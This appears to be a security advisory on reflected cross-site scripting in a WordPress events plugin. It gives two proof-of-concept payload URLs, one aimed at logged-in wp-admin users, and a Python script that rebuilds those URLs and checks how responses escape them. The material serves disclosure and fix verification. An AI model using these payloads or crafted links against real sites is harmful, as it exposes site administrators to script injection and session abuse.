Description

The plugin does not sanitise or escape the `keyword` and `ep_filter_date` request parameters before outputting them back into the page, leading to Reflected Cross-Site Scripting (XSS). Since the payload is carried in a crafted URL, it can be used against high-privilege users such as an admin who is tricked into opening the link; POC 2 below is reflected inside the wp-admin area.
POC 1 - Visit any of the following pages created by the plugin:
- Event Organizers
- Event Types
- Performers
- Venues
Add the `keyword` parameter to the URL with the following value and load the new URL to trigger the XSS.
E.g. https://example.com/event-types/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3E
---
POC 2 - While logged in to wp-admin, visit the following URL:
https://example.com/wp-admin/edit.php?post_type=em_event&ep_filter_date=2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+"
Move the mouse over the date filter input to trigger the XSS.
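As an added example (not the plugin's or the advisory author's code), the following Python script rebuilds the two POC URLs, shows the vulnerable echo of the parameter next to an insufficient and a correct escaping of it, and provides a check that classifies how a response reflects a payload, which is useful for confirming a fix. The `<input>` markup, the function names and the classification labels are assumptions; the plugin's real templates are not shown on this page.

```python
"""Reflection check for the two POCs above.

Added example, not the plugin's or the advisory author's code. It assumes
the plugin echoes the `keyword` and `ep_filter_date` parameters into an
attribute value of an <input> element; the markup below is constructed to
show the vulnerable output next to an insufficient and a correct fix.
"""
import html
import urllib.parse
import urllib.request

# The two payloads from the advisory, URL-decoded.
POC1_PAYLOAD = '"><img src=x onerror=alert(/XSS/)>'
POC2_PAYLOAD = '2023-08-08" onmouseover=alert(/XSS/) "'

# Constructed markup; the real plugin template is not known here.
INPUT_TEMPLATE = '<input type="text" name="{name}" value="{value}">'


def render_unescaped(name: str, value: str) -> str:
    """Vulnerable pattern: the request parameter is echoed as-is."""
    return INPUT_TEMPLATE.format(name=name, value=value)


def render_html_only(name: str, value: str) -> str:
    """Insufficient fix: <, > and & are encoded but quotes are not, so an
    attribute breakout like POC 2 still works unchanged."""
    return INPUT_TEMPLATE.format(name=name, value=html.escape(value, quote=False))


def render_attr_escaped(name: str, value: str) -> str:
    """Correct fix for an attribute context: quotes are encoded as well
    (the equivalent of WordPress's esc_attr())."""
    return INPUT_TEMPLATE.format(name=name, value=html.escape(value, quote=True))


def build_poc_url(page_url: str, param: str, payload: str) -> str:
    """Append the payload to a page URL, percent-encoding every reserved byte."""
    sep = "&" if "?" in page_url else "?"
    return f"{page_url}{sep}{param}={urllib.parse.quote(payload, safe='')}"


def classify_reflection(body: str, payload: str) -> str:
    """Classify how a response body reflects a payload.

    'unescaped'  raw payload present: exploitable
    'escaped'    quotes and angle brackets encoded: safe in an attribute value
    'partial'    only <, > and & encoded: still exploitable in an attribute
    'absent'     payload not reflected at all
    """
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    if html.escape(payload, quote=False) in body:
        return "partial"
    return "absent"


def check_url(url: str, payload: str, timeout: float = 10.0) -> str:
    """Fetch a URL and classify the reflection (needs network; not run here).
    For POC 2 the request must carry a logged-in wp-admin session cookie."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return classify_reflection(body, payload)


if __name__ == "__main__":
    cases = (
        ("https://example.com/event-types/", "keyword", POC1_PAYLOAD),
        ("https://example.com/wp-admin/edit.php?post_type=em_event", "ep_filter_date", POC2_PAYLOAD),
    )
    for page, name, payload in cases:
        print(build_poc_url(page, name, payload))
        for render in (render_unescaped, render_html_only, render_attr_escaped):
            verdict = classify_reflection(render(name, payload), payload)
            print(f"  {render.__name__:22} {verdict}")
```

The `render_html_only` case is the caveat worth noting when verifying a patch: encoding only angle brackets looks like a fix for POC 1 but leaves the quote-breakout of POC 2 fully intact, so a reflected value that lands inside an attribute needs attribute-context escaping, not just tag stripping.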